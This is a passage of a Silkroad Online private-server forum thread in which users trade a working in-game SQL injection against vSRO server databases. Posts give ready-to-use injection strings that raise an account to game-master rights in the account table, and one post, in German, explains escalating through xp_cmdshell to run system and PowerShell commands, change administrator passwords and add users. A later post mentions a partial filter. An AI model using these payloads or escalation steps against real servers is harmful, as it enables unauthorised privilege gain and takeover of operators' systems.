|
You last visited: Today at 14:23
Advertisement
[INFORMATION] SQL Injection (ingame)
Discussion on [INFORMATION] SQL Injection (ingame) within the SRO Private Server forum part of the Silkroad Online category.
01/03/2017, 17:55
|
#76
|
elite*gold: 0
Join Date: Apr 2015
Posts: 1,444
Received Thanks: 1,371
|
Quote:
Originally Posted by geheimerbauer
But it is just possible to get access to SRO_VT_SHARD.dbo or can i get access to SRO_VT_ACCOUNT.dbo too?
|
It's a SQL inject, you can access whatever DB you wish.
|
|
|
01/04/2017, 00:27
|
#77
|
elite*gold: 0
Join Date: Nov 2009
Posts: 102
Received Thanks: 14
|
Thank you.
I dont know SQL very well. i just have some basic knowledge in Java.
I'm also not so familiar with silkroad files, but is it possible to make a GM account like this?
Code:
a'; UPDATE SRO_VT_ACCOUNT.dbo.TB_User SET sec_primary = 1 WHERE StrUserID = 'YourAccountID';--
a'; UPDATE SRO_VT_ACCOUNT.dbo.TB_User SET sec_content = 1 WHERE StrUserID = 'YourAccountID';--
I know there is not realy a use for it, when you have access to the DB, but it could happen that you lose Fortress
|
|
|
01/04/2017, 09:16
|
#78
|
elite*gold: 0
Join Date: Apr 2015
Posts: 1,444
Received Thanks: 1,371
|
Quote:
Originally Posted by geheimerbauer
Thank you.
I dont know SQL very well. i just have some basic knowledge in Java.
I'm also not so familiar with silkroad files, but is it possible to make a GM account like this?
Code:
a'; UPDATE SRO_VT_ACCOUNT.dbo.TB_User SET sec_primary = 1 WHERE StrUserID = 'YourAccountID';--
a'; UPDATE SRO_VT_ACCOUNT.dbo.TB_User SET sec_content = 1 WHERE StrUserID = 'YourAccountID';--
I know there is not realy a use for it, when you have access to the DB, but it could happen that you lose Fortress
|
a'; UPDATE SRO_VT_ACCOUNT.dbo.TB_User SET sec_primary = 1, sec_content = 1 WHERE StrUserID = 'YourAccountID';--
Will not work if they changed SRO_VT_ACCOUNT to something else ^^
|
|
|
01/08/2017, 03:19
|
#79
|
elite*gold: 56
Join Date: Oct 2013
Posts: 1,165
Received Thanks: 762
|
Quote:
Originally Posted by geheimerbauer
Thank you.
I dont know SQL very well. i just have some basic knowledge in Java.
I'm also not so familiar with silkroad files, but is it possible to make a GM account like this?
Code:
a'; UPDATE SRO_VT_ACCOUNT.dbo.TB_User SET sec_primary = 1 WHERE StrUserID = 'YourAccountID';--
a'; UPDATE SRO_VT_ACCOUNT.dbo.TB_User SET sec_content = 1 WHERE StrUserID = 'YourAccountID';--
I know there is not realy a use for it, when you have access to the DB, but it could happen that you lose Fortress
|
Ja, sollte funktionieren wenn die Database nicht umbenannt wurde, und selbst wenn kann du dir die Database genannt beim Namen zusenden lassen (indem du das Message System von Silkroad benutzt)
Desweiteren ist es möglich sollte xp_cmdshell aktiviert sein ganze CMD Befehle auszuführen (z.b. das Password des Admins ändern oder dir sogar einen neuen Benutzer erstellen) - das geht aber nur wenn der SQL Service mit local administrator rechten ausgestattet ist
Und da die benutzer welche die Silkroad Databases managen meist der sa user ist kannst du im zweifel xp_cmdshell selbst aktivieren ( )
mit der CMD ist es dir dann möglich die Powershell zu starten welche im vergleich zur CMD viel mächtiger ist und solltest du die Powershell beherschen und Administrator rechte haben dann ist ganz vorbei.
Die SQL Injection ist weitaus kritischer als viele denken.
|
|
|
02/04/2017, 17:32
|
#80
|
elite*gold: 0
Join Date: Feb 2013
Posts: 75
Received Thanks: 10
|
what da hell did i just see?????????? i didn't investigate that exploit until now
oh-no seriously vsro are a piece **** yada-yada-yada
yet still be able to restrict it through blocking tables name @ ServerSide (only) inside AbuseFilter.txt at least who will try to execute it will get crash
honestly didn't execute that horrible exploit yet so i can't confirm that the fix i just mentioned is either work or not (if it could be called a fix after all xD)
|
|
|
02/04/2017, 18:06
|
#81
|
elite*gold: 28
Join Date: Aug 2014
Posts: 4,096
Received Thanks: 2,649
|
Quote:
Originally Posted by ZeonNETWORK
what da hell did i just see?????????? i didn't investigate that exploit until now
oh-no seriously vsro are a piece **** yada-yada-yada
yet still be able to restrict it through blocking tables name @ ServerSide (only) inside AbuseFilter.txt at least who will try to execute it will get crash
honestly didn't execute that horrible exploit yet so i can't confirm that the fix i just mentioned is either work or not (if it could be called a fix after all xD)
|
That's the only injection there is. Stop over exaggerating please.
|
|
|
02/04/2017, 18:15
|
#82
|
elite*gold: 0
Join Date: Feb 2013
Posts: 75
Received Thanks: 10
|
Quote:
Originally Posted by Exo
That's the only injection there is. Stop over exaggerating please.
|
you mean there's a lot of sql injections out there?
well i don't know, been a long time from vsro (sticked with BR and Tsro somehow)
okay can you post the common injections??
|
|
|
02/04/2017, 18:51
|
#83
|
elite*gold: 28
Join Date: Aug 2014
Posts: 4,096
Received Thanks: 2,649
|
Quote:
Originally Posted by ZeonNETWORK
you mean there's a lot of sql injections out there?
well i don't know, been a long time from vsro (sticked with BR and Tsro somehow)
okay can you post the common injections??
|
There isn't any other injections in-game. All other strings are being checked before a procedure call is executed. This is the only one.
|
|
|
11/19/2018, 15:37
|
#84
|
elite*gold: 0
Join Date: Dec 2011
Posts: 42
Received Thanks: 2
|
nobody know
some new way to sql injection , coz that way so old
|
|
|
|
|
Similar Threads
|
[Information] Was bedeuten die Zahlen oben?, Was bekomme ich? [Information]
12/16/2010 - WarRock - 3 Replies
Hi com,
wie bestimmt schon ihr alle bemerkt habt, gab es ein Update und somit ein neues Event (Habe ich aber auch gestern gegen 02:00 Uhr gepostet.
Also ich möchte hier mal Klarstellen, was es mit dem Event aufsich hat.
-Was bedeuten diese Zahlen oben Links?
Also, Links steht am Anfang 300, das heißt ihr müsst 300 Kills mit Schneebällen erreichen und bekommt Anschließend einen Preis! Nach 300 kommen 500, dannach 700 und Anschließend 900, vielleicht mehr, was ich leider nicht weiss.
|
miss information about dll injection
09/26/2009 - Aion - 0 Replies
nvm..
|
C# Get ingame information
01/09/2009 - Silkroad Online - 2 Replies
Hi all,
I know more or less how I can get ingame information with CE, but I would like to know how can I get the CE information in C# or visual basic because I want to make an application with it but I don't know how use CE's information. I can't find anything..
Thanks a lot in advance. :)
uoah
|
Ingame injection
03/27/2008 - Dekaron - 7 Replies
Hey guys..
I just want to know if there is one way to inject hacks into game by hitting F12 or any else.
Like the Hacks for Counter-Strike..U start them, start the game and when u are ingame u hit F12 and a Menu pops up where u can change some values like Autoshoot, Aimbot, Speedhack and so on..
Now my question:
Is there any way to get Hacks injected, when u are already ingame?
Greez
spam
|
All times are GMT +2. The time now is 14:23.
|
|